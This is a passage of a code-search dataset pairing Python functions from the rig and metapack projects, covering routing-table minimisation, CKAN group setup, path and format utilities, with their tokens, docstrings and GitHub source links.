return min((f(table, target_length) for f in methods), key=len) | python | def minimise_table(table, target_length,
methods=(remove_default_entries, ordered_covering)):
"""Apply different minimisation algorithms to minimise a single routing
table.
Parameters
----------
table : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Routing table to minimise. NOTE: This is the data structure as
returned by :py:meth:`~rig.routing_table.routing_tree_to_tables`.
target_length : int or None
Maximum length of the routing table. If None then all methods will be
tried and the smallest achieved table will be returned.
methods :
Each method is tried in the order presented and the first to meet the
required target length for a given chip is used. Consequently less
computationally costly algorithms should be nearer the start of the
list. The defaults will try to remove default routes
(:py:meth:rig.routing_table.remove_default_routes.minimise) and then
fall back on the ordered covering algorithm
(:py:meth:rig.routing_table.ordered_covering.minimise).
Returns
-------
[:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Minimised routing table, guaranteed to be at least as small as
`target_length`, or as small as possible if `target_length` is None.
Raises
------
MinimisationFailedError
If no method can sufficiently minimise the table.
"""
# Add a final method which checks the size of the table and returns it if
# the size is correct. NOTE: This method will avoid running any other
# minimisers if the table is already sufficiently small.
methods = list(methods)
methods.insert(0, _identity)
if target_length is not None:
best_achieved = len(table)
# Try each minimiser in turn until the table is small enough
for f in methods:
try:
# Minimise the table, if this fails a MinimisationFailedError
# will be raised and the return will not be executed.
new_table = f(table, target_length)
return new_table
except MinimisationFailedError as exc:
# Store the best achieved final length
if best_achieved is None or exc.final_length < best_achieved:
best_achieved = exc.final_length
# The table must still be too large
raise MinimisationFailedError(target_length, best_achieved)
else:
# Try all methods and return the smallest table
return min((f(table, target_length) for f in methods), key=len) | [
"def",
"minimise_table",
"(",
"table",
",",
"target_length",
",",
"methods",
"=",
"(",
"remove_default_entries",
",",
"ordered_covering",
")",
")",
":",
"# Add a final method which checks the size of the table and returns it if",
"# the size is correct. NOTE: This method will avoid running any other",
"# minimisers if the table is already sufficiently small.",
"methods",
"=",
"list",
"(",
"methods",
")",
"methods",
".",
"insert",
"(",
"0",
",",
"_identity",
")",
"if",
"target_length",
"is",
"not",
"None",
":",
"best_achieved",
"=",
"len",
"(",
"table",
")",
"# Try each minimiser in turn until the table is small enough",
"for",
"f",
"in",
"methods",
":",
"try",
":",
"# Minimise the table, if this fails a MinimisationFailedError",
"# will be raised and the return will not be executed.",
"new_table",
"=",
"f",
"(",
"table",
",",
"target_length",
")",
"return",
"new_table",
"except",
"MinimisationFailedError",
"as",
"exc",
":",
"# Store the best achieved final length",
"if",
"best_achieved",
"is",
"None",
"or",
"exc",
".",
"final_length",
"<",
"best_achieved",
":",
"best_achieved",
"=",
"exc",
".",
"final_length",
"# The table must still be too large",
"raise",
"MinimisationFailedError",
"(",
"target_length",
",",
"best_achieved",
")",
"else",
":",
"# Try all methods and return the smallest table",
"return",
"min",
"(",
"(",
"f",
"(",
"table",
",",
"target_length",
")",
"for",
"f",
"in",
"methods",
")",
",",
"key",
"=",
"len",
")"
] | Apply different minimisation algorithms to minimise a single routing
table.
Parameters
----------
table : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Routing table to minimise. NOTE: This is the data structure as
returned by :py:meth:`~rig.routing_table.routing_tree_to_tables`.
target_length : int or None
Maximum length of the routing table. If None then all methods will be
tried and the smallest achieved table will be returned.
methods :
Each method is tried in the order presented and the first to meet the
required target length for a given chip is used. Consequently less
computationally costly algorithms should be nearer the start of the
list. The defaults will try to remove default routes
(:py:meth:rig.routing_table.remove_default_routes.minimise) and then
fall back on the ordered covering algorithm
(:py:meth:rig.routing_table.ordered_covering.minimise).
Returns
-------
[:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Minimised routing table, guaranteed to be at least as small as
`target_length`, or as small as possible if `target_length` is None.
Raises
------
MinimisationFailedError
If no method can sufficiently minimise the table. | [
"Apply",
"different",
"minimisation",
"algorithms",
"to",
"minimise",
"a",
"single",
"routing",
"table",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/minimise.py#L74-L132 |
project-rig/rig | rig/routing_table/minimise.py | _identity | def _identity(table, target_length):
"""Identity minimisation function."""
if target_length is None or len(table) < target_length:
return table
raise MinimisationFailedError(target_length, len(table)) | python | def _identity(table, target_length):
"""Identity minimisation function."""
if target_length is None or len(table) < target_length:
return table
raise MinimisationFailedError(target_length, len(table)) | [
"def",
"_identity",
"(",
"table",
",",
"target_length",
")",
":",
"if",
"target_length",
"is",
"None",
"or",
"len",
"(",
"table",
")",
"<",
"target_length",
":",
"return",
"table",
"raise",
"MinimisationFailedError",
"(",
"target_length",
",",
"len",
"(",
"table",
")",
")"
] | Identity minimisation function. | [
"Identity",
"minimisation",
"function",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/minimise.py#L135-L139 |
Metatab/metapack | metapack/cli/metakan.py | configure_ckan | def configure_ckan(m):
"""Load groups and organizations, from a file in Metatab format"""
from ckanapi import RemoteCKAN
try:
doc = MetapackDoc(m.mt_file, cache=m.cache)
except (IOError, MetatabError) as e:
err("Failed to open metatab '{}': {}".format(m.mt_file, e))
c = RemoteCKAN(m.ckan_url, apikey=m.api_key)
groups = { g['name']:g for g in c.action.group_list(all_fields=True) }
for g in doc['Groups']:
if g.value not in groups:
prt('Creating group: ', g.value)
c.action.group_create(name=g.value,
title=g.get_value('title'),
description=g.get_value('description'),
id=g.get_value('id'),
image_url=g.get_value('image_url'))
orgs = {o['name']: o for o in c.action.organization_list(all_fields=True)}
for o in doc['Organizations']:
if o.value not in orgs:
prt('Creating organization: ', o.value)
c.action.organization_create(name=o.value,
title=o.get_value('title'),
description=o.get_value('description'),
id=o.get_value('id'),
image_url=o.get_value('image_url')) | python | def configure_ckan(m):
"""Load groups and organizations, from a file in Metatab format"""
from ckanapi import RemoteCKAN
try:
doc = MetapackDoc(m.mt_file, cache=m.cache)
except (IOError, MetatabError) as e:
err("Failed to open metatab '{}': {}".format(m.mt_file, e))
c = RemoteCKAN(m.ckan_url, apikey=m.api_key)
groups = { g['name']:g for g in c.action.group_list(all_fields=True) }
for g in doc['Groups']:
if g.value not in groups:
prt('Creating group: ', g.value)
c.action.group_create(name=g.value,
title=g.get_value('title'),
description=g.get_value('description'),
id=g.get_value('id'),
image_url=g.get_value('image_url'))
orgs = {o['name']: o for o in c.action.organization_list(all_fields=True)}
for o in doc['Organizations']:
if o.value not in orgs:
prt('Creating organization: ', o.value)
c.action.organization_create(name=o.value,
title=o.get_value('title'),
description=o.get_value('description'),
id=o.get_value('id'),
image_url=o.get_value('image_url')) | [
"def",
"configure_ckan",
"(",
"m",
")",
":",
"from",
"ckanapi",
"import",
"RemoteCKAN",
"try",
":",
"doc",
"=",
"MetapackDoc",
"(",
"m",
".",
"mt_file",
",",
"cache",
"=",
"m",
".",
"cache",
")",
"except",
"(",
"IOError",
",",
"MetatabError",
")",
"as",
"e",
":",
"err",
"(",
"\"Failed to open metatab '{}': {}\"",
".",
"format",
"(",
"m",
".",
"mt_file",
",",
"e",
")",
")",
"c",
"=",
"RemoteCKAN",
"(",
"m",
".",
"ckan_url",
",",
"apikey",
"=",
"m",
".",
"api_key",
")",
"groups",
"=",
"{",
"g",
"[",
"'name'",
"]",
":",
"g",
"for",
"g",
"in",
"c",
".",
"action",
".",
"group_list",
"(",
"all_fields",
"=",
"True",
")",
"}",
"for",
"g",
"in",
"doc",
"[",
"'Groups'",
"]",
":",
"if",
"g",
".",
"value",
"not",
"in",
"groups",
":",
"prt",
"(",
"'Creating group: '",
",",
"g",
".",
"value",
")",
"c",
".",
"action",
".",
"group_create",
"(",
"name",
"=",
"g",
".",
"value",
",",
"title",
"=",
"g",
".",
"get_value",
"(",
"'title'",
")",
",",
"description",
"=",
"g",
".",
"get_value",
"(",
"'description'",
")",
",",
"id",
"=",
"g",
".",
"get_value",
"(",
"'id'",
")",
",",
"image_url",
"=",
"g",
".",
"get_value",
"(",
"'image_url'",
")",
")",
"orgs",
"=",
"{",
"o",
"[",
"'name'",
"]",
":",
"o",
"for",
"o",
"in",
"c",
".",
"action",
".",
"organization_list",
"(",
"all_fields",
"=",
"True",
")",
"}",
"for",
"o",
"in",
"doc",
"[",
"'Organizations'",
"]",
":",
"if",
"o",
".",
"value",
"not",
"in",
"orgs",
":",
"prt",
"(",
"'Creating organization: '",
",",
"o",
".",
"value",
")",
"c",
".",
"action",
".",
"organization_create",
"(",
"name",
"=",
"o",
".",
"value",
",",
"title",
"=",
"o",
".",
"get_value",
"(",
"'title'",
")",
",",
"description",
"=",
"o",
".",
"get_value",
"(",
"'description'",
")",
",",
"id",
"=",
"o",
".",
"get_value",
"(",
"'id'",
")",
",",
"image_url",
"=",
"o",
".",
"get_value",
"(",
"'image_url'",
")",
")"
] | Load groups and organizations, from a file in Metatab format | [
"Load",
"groups",
"and",
"organizations",
"from",
"a",
"file",
"in",
"Metatab",
"format"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/cli/metakan.py#L353-L386 |
Metatab/metapack | metapack/cli/metakan.py | package_load_instructions | def package_load_instructions(inst_distributions):
"""Load instructions, displayed in the package notes"""
per_package_inst = ''
for dist in inst_distributions:
if dist.type == 'zip':
per_package_inst += dedent(
"""
# Loading the ZIP Package
Zip packages are compressed, so large resources may load faster.
import metapack as mp
pkg = mp.open_package('{url}')
""".format(url=dist.package_url.inner))
elif dist.type == 'csv':
per_package_inst += dedent(
"""
# Loading the CSV Package
CSV packages load resources individually, so small resources may load faster.
import metapack as mp
pkg = mp.open_package('{url}')
""".format(url=dist.package_url.inner))
if per_package_inst:
return '\n---\n'+per_package_inst
else:
return '' | python | def package_load_instructions(inst_distributions):
"""Load instructions, displayed in the package notes"""
per_package_inst = ''
for dist in inst_distributions:
if dist.type == 'zip':
per_package_inst += dedent(
"""
# Loading the ZIP Package
Zip packages are compressed, so large resources may load faster.
import metapack as mp
pkg = mp.open_package('{url}')
""".format(url=dist.package_url.inner))
elif dist.type == 'csv':
per_package_inst += dedent(
"""
# Loading the CSV Package
CSV packages load resources individually, so small resources may load faster.
import metapack as mp
pkg = mp.open_package('{url}')
""".format(url=dist.package_url.inner))
if per_package_inst:
return '\n---\n'+per_package_inst
else:
return '' | [
"def",
"package_load_instructions",
"(",
"inst_distributions",
")",
":",
"per_package_inst",
"=",
"''",
"for",
"dist",
"in",
"inst_distributions",
":",
"if",
"dist",
".",
"type",
"==",
"'zip'",
":",
"per_package_inst",
"+=",
"dedent",
"(",
"\"\"\"\n # Loading the ZIP Package\n \n Zip packages are compressed, so large resources may load faster.\n \n import metapack as mp\n pkg = mp.open_package('{url}')\n \n \"\"\"",
".",
"format",
"(",
"url",
"=",
"dist",
".",
"package_url",
".",
"inner",
")",
")",
"elif",
"dist",
".",
"type",
"==",
"'csv'",
":",
"per_package_inst",
"+=",
"dedent",
"(",
"\"\"\"\n # Loading the CSV Package\n \n CSV packages load resources individually, so small resources may load faster. \n \n \n import metapack as mp\n pkg = mp.open_package('{url}')\n \n \"\"\"",
".",
"format",
"(",
"url",
"=",
"dist",
".",
"package_url",
".",
"inner",
")",
")",
"if",
"per_package_inst",
":",
"return",
"'\\n---\\n'",
"+",
"per_package_inst",
"else",
":",
"return",
"''"
] | Load instructions, displayed in the package notes | [
"Load",
"instructions",
"displayed",
"in",
"the",
"package",
"notes"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/cli/metakan.py#L403-L440 |
Metatab/metapack | metapack/cli/metakan.py | dump_ckan | def dump_ckan(m):
"""Create a groups and organization file"""
doc = MetapackDoc(cache=m.cache)
doc.new_section('Groups', 'Title Description Id Image_url'.split())
doc.new_section('Organizations', 'Title Description Id Image_url'.split())
c = RemoteCKAN(m.ckan_url, apikey=m.api_key)
for g in c.action.group_list(all_fields=True):
print(g.keys())
for o in c.action.organization_list(all_fields=True):
print(g.keys()) | python | def dump_ckan(m):
"""Create a groups and organization file"""
doc = MetapackDoc(cache=m.cache)
doc.new_section('Groups', 'Title Description Id Image_url'.split())
doc.new_section('Organizations', 'Title Description Id Image_url'.split())
c = RemoteCKAN(m.ckan_url, apikey=m.api_key)
for g in c.action.group_list(all_fields=True):
print(g.keys())
for o in c.action.organization_list(all_fields=True):
print(g.keys()) | [
"def",
"dump_ckan",
"(",
"m",
")",
":",
"doc",
"=",
"MetapackDoc",
"(",
"cache",
"=",
"m",
".",
"cache",
")",
"doc",
".",
"new_section",
"(",
"'Groups'",
",",
"'Title Description Id Image_url'",
".",
"split",
"(",
")",
")",
"doc",
".",
"new_section",
"(",
"'Organizations'",
",",
"'Title Description Id Image_url'",
".",
"split",
"(",
")",
")",
"c",
"=",
"RemoteCKAN",
"(",
"m",
".",
"ckan_url",
",",
"apikey",
"=",
"m",
".",
"api_key",
")",
"for",
"g",
"in",
"c",
".",
"action",
".",
"group_list",
"(",
"all_fields",
"=",
"True",
")",
":",
"print",
"(",
"g",
".",
"keys",
"(",
")",
")",
"for",
"o",
"in",
"c",
".",
"action",
".",
"organization_list",
"(",
"all_fields",
"=",
"True",
")",
":",
"print",
"(",
"g",
".",
"keys",
"(",
")",
")"
] | Create a groups and organization file | [
"Create",
"a",
"groups",
"and",
"organization",
"file"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/cli/metakan.py#L442-L455 |
Metatab/metapack | metapack/cli/metakan.py | MetapackCliMemo.update_mt_arg | def update_mt_arg(self, metatabfile):
"""Return a new memo with a new metatabfile argument"""
o = MetapackCliMemo(self.args)
o.set_mt_arg(metatabfile)
return o | python | def update_mt_arg(self, metatabfile):
"""Return a new memo with a new metatabfile argument"""
o = MetapackCliMemo(self.args)
o.set_mt_arg(metatabfile)
return o | [
"def",
"update_mt_arg",
"(",
"self",
",",
"metatabfile",
")",
":",
"o",
"=",
"MetapackCliMemo",
"(",
"self",
".",
"args",
")",
"o",
".",
"set_mt_arg",
"(",
"metatabfile",
")",
"return",
"o"
] | Return a new memo with a new metatabfile argument | [
"Return",
"a",
"new",
"memo",
"with",
"a",
"new",
"metatabfile",
"argument"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/cli/metakan.py#L45-L49 |
project-rig/rig | docs/source/conf.py | linkcode_resolve | def linkcode_resolve(domain, info):
"""Determine the URL corresponding to Python object on GitHub
This code is derived from the version used by `Numpy
<https://github.com/numpy/numpy/blob/v1.9.2/doc/source/conf.py#L286>`_.
"""
# Only link to Python source
if domain != 'py':
return None
# Get a reference to the object in question
modname = info['module']
fullname = info['fullname']
submod = sys.modules.get(modname)
if submod is None:
return None
obj = submod
for part in fullname.split('.'):
try:
obj = getattr(obj, part)
except:
return None
# Find the file which contains the object
try:
file_name = inspect.getsourcefile(obj)
except:
file_name = None
if not file_name:
return None
# Convert the filename into a path relative to the rig module top-level
file_name = os.path.relpath(file_name, start=os.path.dirname(local_module_path))
# Get the line number range that object lives on
try:
source, lineno = inspect.getsourcelines(obj)
except:
lineno = None
if lineno:
linespec = "#L{}-L{}".format(lineno,
lineno + len(source) - 1)
else:
linespec = ""
# Generate a link to the code in the official GitHub repository with the
# current-version's tag.
return ("https://github.com/{repo}/blob/v{version}/"
"{module_path}{file_name}{linespec}".format(repo=github_repo,
version=version,
module_path=github_module_path,
file_name=file_name,
linespec=linespec)) | python | def linkcode_resolve(domain, info):
"""Determine the URL corresponding to Python object on GitHub
This code is derived from the version used by `Numpy
<https://github.com/numpy/numpy/blob/v1.9.2/doc/source/conf.py#L286>`_.
"""
# Only link to Python source
if domain != 'py':
return None
# Get a reference to the object in question
modname = info['module']
fullname = info['fullname']
submod = sys.modules.get(modname)
if submod is None:
return None
obj = submod
for part in fullname.split('.'):
try:
obj = getattr(obj, part)
except:
return None
# Find the file which contains the object
try:
file_name = inspect.getsourcefile(obj)
except:
file_name = None
if not file_name:
return None
# Convert the filename into a path relative to the rig module top-level
file_name = os.path.relpath(file_name, start=os.path.dirname(local_module_path))
# Get the line number range that object lives on
try:
source, lineno = inspect.getsourcelines(obj)
except:
lineno = None
if lineno:
linespec = "#L{}-L{}".format(lineno,
lineno + len(source) - 1)
else:
linespec = ""
# Generate a link to the code in the official GitHub repository with the
# current-version's tag.
return ("https://github.com/{repo}/blob/v{version}/"
"{module_path}{file_name}{linespec}".format(repo=github_repo,
version=version,
module_path=github_module_path,
file_name=file_name,
linespec=linespec)) | [
"def",
"linkcode_resolve",
"(",
"domain",
",",
"info",
")",
":",
"# Only link to Python source",
"if",
"domain",
"!=",
"'py'",
":",
"return",
"None",
"# Get a reference to the object in question",
"modname",
"=",
"info",
"[",
"'module'",
"]",
"fullname",
"=",
"info",
"[",
"'fullname'",
"]",
"submod",
"=",
"sys",
".",
"modules",
".",
"get",
"(",
"modname",
")",
"if",
"submod",
"is",
"None",
":",
"return",
"None",
"obj",
"=",
"submod",
"for",
"part",
"in",
"fullname",
".",
"split",
"(",
"'.'",
")",
":",
"try",
":",
"obj",
"=",
"getattr",
"(",
"obj",
",",
"part",
")",
"except",
":",
"return",
"None",
"# Find the file which contains the object",
"try",
":",
"file_name",
"=",
"inspect",
".",
"getsourcefile",
"(",
"obj",
")",
"except",
":",
"file_name",
"=",
"None",
"if",
"not",
"file_name",
":",
"return",
"None",
"# Convert the filename into a path relative to the rig module top-level",
"file_name",
"=",
"os",
".",
"path",
".",
"relpath",
"(",
"file_name",
",",
"start",
"=",
"os",
".",
"path",
".",
"dirname",
"(",
"local_module_path",
")",
")",
"# Get the line number range that object lives on",
"try",
":",
"source",
",",
"lineno",
"=",
"inspect",
".",
"getsourcelines",
"(",
"obj",
")",
"except",
":",
"lineno",
"=",
"None",
"if",
"lineno",
":",
"linespec",
"=",
"\"#L{}-L{}\"",
".",
"format",
"(",
"lineno",
",",
"lineno",
"+",
"len",
"(",
"source",
")",
"-",
"1",
")",
"else",
":",
"linespec",
"=",
"\"\"",
"# Generate a link to the code in the official GitHub repository with the",
"# current-version's tag.",
"return",
"(",
"\"https://github.com/{repo}/blob/v{version}/\"",
"\"{module_path}{file_name}{linespec}\"",
".",
"format",
"(",
"repo",
"=",
"github_repo",
",",
"version",
"=",
"version",
",",
"module_path",
"=",
"github_module_path",
",",
"file_name",
"=",
"file_name",
",",
"linespec",
"=",
"linespec",
")",
")"
] | Determine the URL corresponding to Python object on GitHub
This code is derived from the version used by `Numpy
<https://github.com/numpy/numpy/blob/v1.9.2/doc/source/conf.py#L286>`_. | [
"Determine",
"the",
"URL",
"corresponding",
"to",
"Python",
"object",
"on",
"GitHub",
"This",
"code",
"is",
"derived",
"from",
"the",
"version",
"used",
"by",
"Numpy",
"<https",
":",
"//",
"github",
".",
"com",
"/",
"numpy",
"/",
"numpy",
"/",
"blob",
"/",
"v1",
".",
"9",
".",
"2",
"/",
"doc",
"/",
"source",
"/",
"conf",
".",
"py#L286",
">",
"_",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/docs/source/conf.py#L144-L198 |
Metatab/metapack | metapack/util.py | declaration_path | def declaration_path(name):
"""Return the path to an included declaration"""
from os.path import dirname, join, exists
import metatab.declarations
from metatab.exc import IncludeError
d = dirname(metatab.declarations.__file__)
path = join(d, name)
if not exists(path):
path = join(d, name + '.csv')
if not exists(path):
raise IncludeError("No local declaration file for name '{}' ".format(name))
return path | python | def declaration_path(name):
"""Return the path to an included declaration"""
from os.path import dirname, join, exists
import metatab.declarations
from metatab.exc import IncludeError
d = dirname(metatab.declarations.__file__)
path = join(d, name)
if not exists(path):
path = join(d, name + '.csv')
if not exists(path):
raise IncludeError("No local declaration file for name '{}' ".format(name))
return path | [
"def",
"declaration_path",
"(",
"name",
")",
":",
"from",
"os",
".",
"path",
"import",
"dirname",
",",
"join",
",",
"exists",
"import",
"metatab",
".",
"declarations",
"from",
"metatab",
".",
"exc",
"import",
"IncludeError",
"d",
"=",
"dirname",
"(",
"metatab",
".",
"declarations",
".",
"__file__",
")",
"path",
"=",
"join",
"(",
"d",
",",
"name",
")",
"if",
"not",
"exists",
"(",
"path",
")",
":",
"path",
"=",
"join",
"(",
"d",
",",
"name",
"+",
"'.csv'",
")",
"if",
"not",
"exists",
"(",
"path",
")",
":",
"raise",
"IncludeError",
"(",
"\"No local declaration file for name '{}' \"",
".",
"format",
"(",
"name",
")",
")",
"return",
"path"
] | Return the path to an included declaration | [
"Return",
"the",
"path",
"to",
"an",
"included",
"declaration"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/util.py#L16-L32 |
Metatab/metapack | metapack/util.py | flatten | def flatten(d, sep='.'):
"""Flatten a data structure into tuples"""
def _flatten(e, parent_key='', sep='.'):
import collections
prefix = parent_key + sep if parent_key else ''
if isinstance(e, collections.MutableMapping):
return tuple((prefix + k2, v2) for k, v in e.items() for k2, v2 in _flatten(v, k, sep))
elif isinstance(e, collections.MutableSequence):
return tuple((prefix + k2, v2) for i, v in enumerate(e) for k2, v2 in _flatten(v, str(i), sep))
else:
return (parent_key, (e,)),
return tuple((k, v[0]) for k, v in _flatten(d, '', sep)) | python | def flatten(d, sep='.'):
"""Flatten a data structure into tuples"""
def _flatten(e, parent_key='', sep='.'):
import collections
prefix = parent_key + sep if parent_key else ''
if isinstance(e, collections.MutableMapping):
return tuple((prefix + k2, v2) for k, v in e.items() for k2, v2 in _flatten(v, k, sep))
elif isinstance(e, collections.MutableSequence):
return tuple((prefix + k2, v2) for i, v in enumerate(e) for k2, v2 in _flatten(v, str(i), sep))
else:
return (parent_key, (e,)),
return tuple((k, v[0]) for k, v in _flatten(d, '', sep)) | [
"def",
"flatten",
"(",
"d",
",",
"sep",
"=",
"'.'",
")",
":",
"def",
"_flatten",
"(",
"e",
",",
"parent_key",
"=",
"''",
",",
"sep",
"=",
"'.'",
")",
":",
"import",
"collections",
"prefix",
"=",
"parent_key",
"+",
"sep",
"if",
"parent_key",
"else",
"''",
"if",
"isinstance",
"(",
"e",
",",
"collections",
".",
"MutableMapping",
")",
":",
"return",
"tuple",
"(",
"(",
"prefix",
"+",
"k2",
",",
"v2",
")",
"for",
"k",
",",
"v",
"in",
"e",
".",
"items",
"(",
")",
"for",
"k2",
",",
"v2",
"in",
"_flatten",
"(",
"v",
",",
"k",
",",
"sep",
")",
")",
"elif",
"isinstance",
"(",
"e",
",",
"collections",
".",
"MutableSequence",
")",
":",
"return",
"tuple",
"(",
"(",
"prefix",
"+",
"k2",
",",
"v2",
")",
"for",
"i",
",",
"v",
"in",
"enumerate",
"(",
"e",
")",
"for",
"k2",
",",
"v2",
"in",
"_flatten",
"(",
"v",
",",
"str",
"(",
"i",
")",
",",
"sep",
")",
")",
"else",
":",
"return",
"(",
"parent_key",
",",
"(",
"e",
",",
")",
")",
",",
"return",
"tuple",
"(",
"(",
"k",
",",
"v",
"[",
"0",
"]",
")",
"for",
"k",
",",
"v",
"in",
"_flatten",
"(",
"d",
",",
"''",
",",
"sep",
")",
")"
] | Flatten a data structure into tuples | [
"Flatten",
"a",
"data",
"structure",
"into",
"tuples"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/util.py#L59-L74 |
Metatab/metapack | metapack/util.py | make_dir_structure | def make_dir_structure(base_dir):
"""Make the build directory structure. """
def maybe_makedir(*args):
p = join(base_dir, *args)
if exists(p) and not isdir(p):
raise IOError("File '{}' exists but is not a directory ".format(p))
if not exists(p):
makedirs(p)
maybe_makedir(DOWNLOAD_DIR)
maybe_makedir(PACKAGE_DIR)
maybe_makedir(OLD_DIR) | python | def make_dir_structure(base_dir):
"""Make the build directory structure. """
def maybe_makedir(*args):
p = join(base_dir, *args)
if exists(p) and not isdir(p):
raise IOError("File '{}' exists but is not a directory ".format(p))
if not exists(p):
makedirs(p)
maybe_makedir(DOWNLOAD_DIR)
maybe_makedir(PACKAGE_DIR)
maybe_makedir(OLD_DIR) | [
"def",
"make_dir_structure",
"(",
"base_dir",
")",
":",
"def",
"maybe_makedir",
"(",
"*",
"args",
")",
":",
"p",
"=",
"join",
"(",
"base_dir",
",",
"*",
"args",
")",
"if",
"exists",
"(",
"p",
")",
"and",
"not",
"isdir",
"(",
"p",
")",
":",
"raise",
"IOError",
"(",
"\"File '{}' exists but is not a directory \"",
".",
"format",
"(",
"p",
")",
")",
"if",
"not",
"exists",
"(",
"p",
")",
":",
"makedirs",
"(",
"p",
")",
"maybe_makedir",
"(",
"DOWNLOAD_DIR",
")",
"maybe_makedir",
"(",
"PACKAGE_DIR",
")",
"maybe_makedir",
"(",
"OLD_DIR",
")"
] | Make the build directory structure. | [
"Make",
"the",
"build",
"directory",
"structure",
"."
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/util.py#L89-L104 |
Metatab/metapack | metapack/util.py | guess_format | def guess_format(url):
"""Try to guess the format of a resource, possibly with a HEAD request"""
import requests
from requests.exceptions import InvalidSchema
from rowgenerators import parse_url_to_dict
parts = parse_url_to_dict(url)
# Guess_type fails for root urls like 'http://civicknowledge.com'
if parts.get('path'):
type, encoding = mimetypes.guess_type(url)
elif parts['scheme'] in ('http', 'https'):
type, encoding = 'text/html', None # Assume it is a root url
else:
type, encoding = None, None
if type is None:
try:
r = requests.head(url, allow_redirects=False)
type = r.headers['Content-Type']
if ';' in type:
type, encoding = [e.strip() for e in type.split(';')]
except InvalidSchema:
pass # It's probably FTP
return type, mime_map.get(type) | python | def guess_format(url):
"""Try to guess the format of a resource, possibly with a HEAD request"""
import requests
from requests.exceptions import InvalidSchema
from rowgenerators import parse_url_to_dict
parts = parse_url_to_dict(url)
# Guess_type fails for root urls like 'http://civicknowledge.com'
if parts.get('path'):
type, encoding = mimetypes.guess_type(url)
elif parts['scheme'] in ('http', 'https'):
type, encoding = 'text/html', None # Assume it is a root url
else:
type, encoding = None, None
if type is None:
try:
r = requests.head(url, allow_redirects=False)
type = r.headers['Content-Type']
if ';' in type:
type, encoding = [e.strip() for e in type.split(';')]
except InvalidSchema:
pass # It's probably FTP
return type, mime_map.get(type) | [
"def",
"guess_format",
"(",
"url",
")",
":",
"import",
"requests",
"from",
"requests",
".",
"exceptions",
"import",
"InvalidSchema",
"from",
"rowgenerators",
"import",
"parse_url_to_dict",
"parts",
"=",
"parse_url_to_dict",
"(",
"url",
")",
"# Guess_type fails for root urls like 'http://civicknowledge.com'",
"if",
"parts",
".",
"get",
"(",
"'path'",
")",
":",
"type",
",",
"encoding",
"=",
"mimetypes",
".",
"guess_type",
"(",
"url",
")",
"elif",
"parts",
"[",
"'scheme'",
"]",
"in",
"(",
"'http'",
",",
"'https'",
")",
":",
"type",
",",
"encoding",
"=",
"'text/html'",
",",
"None",
"# Assume it is a root url",
"else",
":",
"type",
",",
"encoding",
"=",
"None",
",",
"None",
"if",
"type",
"is",
"None",
":",
"try",
":",
"r",
"=",
"requests",
".",
"head",
"(",
"url",
",",
"allow_redirects",
"=",
"False",
")",
"type",
"=",
"r",
".",
"headers",
"[",
"'Content-Type'",
"]",
"if",
"';'",
"in",
"type",
":",
"type",
",",
"encoding",
"=",
"[",
"e",
".",
"strip",
"(",
")",
"for",
"e",
"in",
"type",
".",
"split",
"(",
"';'",
")",
"]",
"except",
"InvalidSchema",
":",
"pass",
"# It's probably FTP",
"return",
"type",
",",
"mime_map",
".",
"get",
"(",
"type",
")"
] | Try to guess the format of a resource, possibly with a HEAD request | [
"Try",
"to",
"guess",
"the",
"format",
"of",
"a",
"resource",
"possibly",
"with",
"a",
"HEAD",
"request"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/util.py#L202-L229 |
Metatab/metapack | metapack/util.py | walk_up | def walk_up(bottom):
""" mimic os.walk, but walk 'up' instead of down the directory tree
:param bottom:
:return:
"""
import os
from os import path
bottom = path.realpath(bottom)
# get files in current dir
try:
names = os.listdir(bottom)
except Exception as e:
raise e
dirs, nondirs = [], []
for name in names:
if path.isdir(path.join(bottom, name)):
dirs.append(name)
else:
nondirs.append(name)
yield bottom, dirs, nondirs
new_path = path.realpath(path.join(bottom, '..'))
# see if we are at the top
if new_path == bottom:
return
for x in walk_up(new_path):
yield x | python | def walk_up(bottom):
""" mimic os.walk, but walk 'up' instead of down the directory tree
:param bottom:
:return:
"""
import os
from os import path
bottom = path.realpath(bottom)
# get files in current dir
try:
names = os.listdir(bottom)
except Exception as e:
raise e
dirs, nondirs = [], []
for name in names:
if path.isdir(path.join(bottom, name)):
dirs.append(name)
else:
nondirs.append(name)
yield bottom, dirs, nondirs
new_path = path.realpath(path.join(bottom, '..'))
# see if we are at the top
if new_path == bottom:
return
for x in walk_up(new_path):
yield x | [
"def",
"walk_up",
"(",
"bottom",
")",
":",
"import",
"os",
"from",
"os",
"import",
"path",
"bottom",
"=",
"path",
".",
"realpath",
"(",
"bottom",
")",
"# get files in current dir",
"try",
":",
"names",
"=",
"os",
".",
"listdir",
"(",
"bottom",
")",
"except",
"Exception",
"as",
"e",
":",
"raise",
"e",
"dirs",
",",
"nondirs",
"=",
"[",
"]",
",",
"[",
"]",
"for",
"name",
"in",
"names",
":",
"if",
"path",
".",
"isdir",
"(",
"path",
".",
"join",
"(",
"bottom",
",",
"name",
")",
")",
":",
"dirs",
".",
"append",
"(",
"name",
")",
"else",
":",
"nondirs",
".",
"append",
"(",
"name",
")",
"yield",
"bottom",
",",
"dirs",
",",
"nondirs",
"new_path",
"=",
"path",
".",
"realpath",
"(",
"path",
".",
"join",
"(",
"bottom",
",",
"'..'",
")",
")",
